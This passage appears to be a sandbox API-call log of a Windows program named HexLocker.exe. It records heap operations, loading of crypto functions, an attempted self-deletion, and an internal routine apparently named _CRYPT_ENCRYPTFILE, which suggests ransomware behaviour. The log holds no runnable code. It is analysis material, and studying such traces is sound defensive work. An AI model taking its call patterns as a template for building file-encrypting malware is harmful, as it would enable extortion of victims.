[0183.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0183.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0183.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0183.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0183.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0183.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0183.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0183.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0183.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0183.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0183.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0183.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0183.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0183.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0183.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0183.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0183.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0183.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69c28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0183.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0183.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0183.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0183.949] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0183.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0183.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0183.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0183.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0183.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0183.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0183.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0183.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0183.950] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0183.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0183.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0183.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0183.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0183.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0183.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0183.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0183.951] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0183.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0183.951] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0183.951] FreeLibrary (hLibModule=0x756e0000) returned 1 [0183.952] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0183.952] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0183.952] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0183.952] CloseHandle (hObject=0x2a0) returned 1 [0184.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.025] CloseHandle (hObject=0x2d0) returned 1 [0184.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.090] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.090] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0184.090] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexLocker.exe", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", lpFilePart=0x8cedf4*="HexLocker.exe") returned 0x25 [0184.091] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe")) returned 0x20 [0184.091] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe81dffe0, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xe81dffe0, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3ffc408, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xc4066, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HexLocker.exe", cAlternateFileName="HEXLOC~1.EXE")) returned 0xa87050 [0184.091] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe")) returned 0 [0184.091] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0184.092] GetLastError () returned 0x5 [0184.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0184.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0184.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0184.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0184.092] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0184.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0184.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0184.092] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0184.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0184.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0184.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0184.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0184.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0184.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0184.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0184.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0184.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0184.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0184.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0184.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0184.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0184.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0184.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0184.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0184.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0184.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e563a8 [0184.093] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexLocker.exe", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", lpFilePart=0x8cf650*="HexLocker.exe") returned 0x25 [0184.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0184.094] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe")) returned 0x20 [0184.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0184.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0184.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0184.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0184.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0184.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0184.094] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0184.094] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.094] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0184.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0184.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0184.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0184.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0184.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0184.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0184.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0184.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0184.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0184.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0184.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hkGbR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kGbR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GbR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bR.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0184.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0184.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0184.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0184.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0184.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0184.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0184.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0184.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0184.095] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0184.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0184.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0184.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0184.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0184.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0184.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0184.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0184.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0184.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0184.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hkGbR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kGbR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.098] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GbR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0184.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bR.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0184.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0184.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0184.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0184.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0184.099] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0184.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0184.100] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0184.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0184.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0184.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0184.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0184.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0184.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0184.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0184.100] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0184.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0184.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0184.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0184.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0184.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0184.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0184.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0184.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0184.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0184.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0184.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0184.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.215] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0184.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0184.215] RtlAllocateHeap 